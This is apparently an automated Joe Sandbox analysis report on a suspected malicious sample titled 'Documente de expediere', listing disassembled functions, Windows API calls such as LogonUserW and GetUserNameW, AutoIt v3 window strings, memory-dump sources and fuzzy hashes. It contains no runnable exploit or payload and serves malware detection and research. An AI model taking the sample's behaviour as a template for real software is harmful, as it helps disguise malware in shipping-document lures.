                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: 57268c214e17b1f68691566021ceb32437684ef5dc8d3ec572256ff0418acc7f
                                                • Instruction ID: f17b75871d79feb14ca204bc0528440dc3e02724e5a2a7c6f1c7efacc46cea75
                                                • Opcode Fuzzy Hash: 57268c214e17b1f68691566021ceb32437684ef5dc8d3ec572256ff0418acc7f
                                                • Instruction Fuzzy Hash: F4D09EF516560D79FD184B24AC1FFB7110BF3C0791F94A989730A95EC1DCE56851A039
                                                Function 006E8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006E88D1), ref: 006E8CB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
                                                • Instruction ID: cc71d78a571d8e6110c9bf680d00c43c933df90cb4d464d4768eb32df7ad6651
                                                • Opcode Fuzzy Hash: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
                                                • Instruction Fuzzy Hash: 68D09E3226450EABEF019EA8DD05EEE3B69EB04B01F40C511FE15D51A1C775D935AB60
                                                Function 006D2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 006D2242
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: f4585b15eb33ac35868f28c82ad222371338fbc54bd97d21784b69a0315cc2b2
                                                • Instruction ID: e16b013f2e4ae7a3837007018aad2f5c48ffdb4782a4ef53f8601ec60f8d153c
                                                • Opcode Fuzzy Hash: f4585b15eb33ac35868f28c82ad222371338fbc54bd97d21784b69a0315cc2b2
                                                • Instruction Fuzzy Hash: DAC04CF1C00109DBDB05DB90D988DFE77BCAB08304F108156E141F2140D7B49B448A71
                                                Function 006BA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 006BA36A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
                                                • Instruction ID: 63a041da0162bfc313d8ef5c2c202dfcb5437c006ab3692812d989ebbc0eec62
                                                • Opcode Fuzzy Hash: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
                                                • Instruction Fuzzy Hash: 31A0113000020CAB8A002B8AEC08888BFACEA002A0B00C020F80C80022CB32A8208A88
                                                Function 006A8A0E Relevance: .6, Instructions: 608COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70f0524884e2d66e23010b1ba4c72321e1ee71a5c5c7c0bb82d0ab978bfdc379
                                                • Instruction ID: da737a78ae5964c8ffc129bd0c48053709852e28d027c7c18ca75fd46de82b4e
                                                • Opcode Fuzzy Hash: 70f0524884e2d66e23010b1ba4c72321e1ee71a5c5c7c0bb82d0ab978bfdc379
                                                • Instruction Fuzzy Hash: E4222970502755CFDF28AB19C4946BD77A3EB03318F64846AD8478B392DB34AE92CF61
                                                Function 006B2405 Relevance: .3, Instructions: 345COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 730b3c49caaba78eed49d18fe56e4b6f98e60f299f2a8146841dd494096e51d2
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: 29C194B22050531ADB2D4639D4340FEBBE25AA37B135A076DE4B2CF6C5EF20D5A4D720
                                                Function 006B283A Relevance: .3, Instructions: 341COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: 98486735e504d5b035531dd02fc072ca376ae7e00e0c8365c3f1f20d66e9c35d
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: 14C1B4B220519309DF6D463A84340FEBBE25AA37B135A076DE4B2DF6D4EF20D5A4D720
                                                Function 01543670 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction ID: ba61ac31b9dd2ed380448e8d0f4ab915b56d572d3a917449cf1b4d9c1b1ec022
                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction Fuzzy Hash: 7941C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                                Function 01543560 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction ID: a888402703ce1defe235b539af9aff514d349e1ecc8a9111f2c799c08ce378cc
                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction Fuzzy Hash: 30019278A00109EFCB84DF98C5909AEF7F5FF88314F608599D909AB711D730AE51DB80
                                                Function 01543500 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction ID: 1b9b0901d8a29dd2353f09a1e48437e2be2935a2516558f76b9e6036fdbdef4e
                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction Fuzzy Hash: 9D019278A04109EFCB88DF98C5909AEF7F5FB48314F208599D919AB715E730AE41DF80
                                                Function 01541E70 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                Function 007137F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,0071F910), ref: 007138AF
                                                • IsWindowVisible.USER32(?), ref: 007138D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                • Opcode ID: a2ebcbd2cae9b119228ff29e9d2451b455cc0649a55be22421c91097994555ab
                                                • Instruction ID: 09a62fb5d23ffd414fa2286f5a5cb2dd84d5f11a8f01d709548cc8aeba942410
                                                • Opcode Fuzzy Hash: a2ebcbd2cae9b119228ff29e9d2451b455cc0649a55be22421c91097994555ab
                                                • Instruction Fuzzy Hash: 44D19770204305DBCB54EF29C451AEE7BA6AF54344F10846CF8865B3E2DB39EE86CB95
                                                Function 0071A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 0071A89F
                                                • GetSysColorBrush.USER32(0000000F), ref: 0071A8D0
                                                • GetSysColor.USER32(0000000F), ref: 0071A8DC
                                                • SetBkColor.GDI32(?,000000FF), ref: 0071A8F6
                                                • SelectObject.GDI32(?,?), ref: 0071A905
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0071A930
                                                • GetSysColor.USER32(00000010), ref: 0071A938
                                                • CreateSolidBrush.GDI32(00000000), ref: 0071A93F
                                                • FrameRect.USER32(?,?,00000000), ref: 0071A94E
                                                • DeleteObject.GDI32(00000000), ref: 0071A955
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0071A9A0
                                                • FillRect.USER32(?,?,?), ref: 0071A9D2
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071A9FD
                                                  • Part of subcall function 0071AB60: GetSysColor.USER32(00000012), ref: 0071AB99
                                                  • Part of subcall function 0071AB60: SetTextColor.GDI32(?,?), ref: 0071AB9D
                                                  • Part of subcall function 0071AB60: GetSysColorBrush.USER32(0000000F), ref: 0071ABB3
                                                  • Part of subcall function 0071AB60: GetSysColor.USER32(0000000F), ref: 0071ABBE
                                                  • Part of subcall function 0071AB60: GetSysColor.USER32(00000011), ref: 0071ABDB
                                                  • Part of subcall function 0071AB60: CreatePen.GDI32(00000000,00000001,_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{), ref: 0071ABE9
                                                  • Part of subcall function 0071AB60: SelectObject.GDI32(?,00000000), ref: 0071ABFA
                                                  • Part of subcall function 0071AB60: SetBkColor.GDI32(?,00000000), ref: 0071AC03
                                                  • Part of subcall function 0071AB60: SelectObject.GDI32(?,?), ref: 0071AC10
                                                  • Part of subcall function 0071AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0071AC2F
                                                  • Part of subcall function 0071AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071AC46
                                                  • Part of subcall function 0071AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0071AC5B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                • String ID:
                                                • API String ID: 4124339563-0
                                                • Opcode ID: 59560ce93a04222501295a2113f9775bbbfd6919ae8f26f52e5651bd6888fb99
                                                • Instruction ID: d37cb8f8c63d595241bbe969daef1817ced4b4729bc3fe4f5b34ac5b6fcff67a
                                                • Opcode Fuzzy Hash: 59560ce93a04222501295a2113f9775bbbfd6919ae8f26f52e5651bd6888fb99
                                                • Instruction Fuzzy Hash: AEA18071009305FFD7119F68DC08A9B7BAAFF88321F108A29F966D61E1D738D984CB56
                                                Function 00692C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00692CA2
                                                • DeleteObject.GDI32(00000000), ref: 00692CE8
                                                • DeleteObject.GDI32(00000000), ref: 00692CF3
                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00692CFE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00692D09
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 006CC68B
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006CC6C4
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006CCAED
                                                  • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A
                                                • SendMessageW.USER32(?,00001053), ref: 006CCB2A
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006CCB41
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CCB57
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CCB62
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 464785882-4108050209
                                                • Opcode ID: d4e8242d7b7f50f4e7c23ce116d3c4660d22d788ef803efbec5aece3f2c8b4a6
                                                • Instruction ID: 27218b815b7193820ad795b36591a3bfa35c64ed9b9ed3d51f7e0f24a10a3d8a
                                                • Opcode Fuzzy Hash: d4e8242d7b7f50f4e7c23ce116d3c4660d22d788ef803efbec5aece3f2c8b4a6
                                                • Instruction Fuzzy Hash: 2A127C30600602EFDB54DF28C899BB9BBA6FF45320F54856DE499DB662C731E842CB91
                                                Function 0071AB60 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0071AB99
                                                • SetTextColor.GDI32(?,?), ref: 0071AB9D
                                                • GetSysColorBrush.USER32(0000000F), ref: 0071ABB3
                                                • GetSysColor.USER32(0000000F), ref: 0071ABBE
                                                • CreateSolidBrush.GDI32(?), ref: 0071ABC3
                                                • GetSysColor.USER32(00000011), ref: 0071ABDB
                                                • CreatePen.GDI32(00000000,00000001,_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{), ref: 0071ABE9
                                                • SelectObject.GDI32(?,00000000), ref: 0071ABFA
                                                • SetBkColor.GDI32(?,00000000), ref: 0071AC03
                                                • SelectObject.GDI32(?,?), ref: 0071AC10
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0071AC2F
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071AC46
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0071AC5B
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0071ACA7
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0071ACCE
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0071ACEC
                                                • DrawFocusRect.USER32(?,?), ref: 0071ACF7
                                                • GetSysColor.USER32(00000011), ref: 0071AD05
                                                • SetTextColor.GDI32(?,00000000), ref: 0071AD0D
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0071AD21
                                                • SelectObject.GDI32(?,0071A869), ref: 0071AD38
                                                • DeleteObject.GDI32(?), ref: 0071AD43
                                                • SelectObject.GDI32(?,?), ref: 0071AD49
                                                • DeleteObject.GDI32(?), ref: 0071AD4E
                                                • SetTextColor.GDI32(?,?), ref: 0071AD54
                                                • SetBkColor.GDI32(?,?), ref: 0071AD5E
                                                Strings
                                                • _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{, xrefs: 0071ABDF, 0071ABE4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID: _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{
                                                • API String ID: 1996641542-3308908821
                                                • Opcode ID: b9154f4d44bb018a01028b6563cf63325f3f93171d627cc931dab7e69cc65981
                                                • Instruction ID: 25652c77fbaa60b0bc5760b541af6d867b216c378fd88ca3876f56fbbad7850a
                                                • Opcode Fuzzy Hash: b9154f4d44bb018a01028b6563cf63325f3f93171d627cc931dab7e69cc65981
                                                • Instruction Fuzzy Hash: CF612DB1901218FFDB119FA8DC49EEE7B7AEB08320F10C125F915AB2E1D7799940DB94
                                                Function 007077BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 007077F1
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007078B0
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007078EE
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00707900
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00707946
                                                • GetClientRect.USER32(00000000,?), ref: 00707952
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00707996
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007079A5
                                                • GetStockObject.GDI32(00000011), ref: 007079B5
                                                • SelectObject.GDI32(00000000,00000000), ref: 007079B9
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007079C9
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007079D2
                                                • DeleteDC.GDI32(00000000), ref: 007079DB
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00707A07
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00707A1E
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00707A59
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00707A6D
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00707A7E
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00707AAE
                                                • GetStockObject.GDI32(00000011), ref: 00707AB9
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00707AC4
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00707ACE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 1cd028f51df3a3a6803039a405f2f8f74a54366d3b5ec797420a07067e067d1c
                                                • Instruction ID: 84fcb38703a9e48d9d70368584f559c88d08ed0a3669396abcd6d99b24dc138a
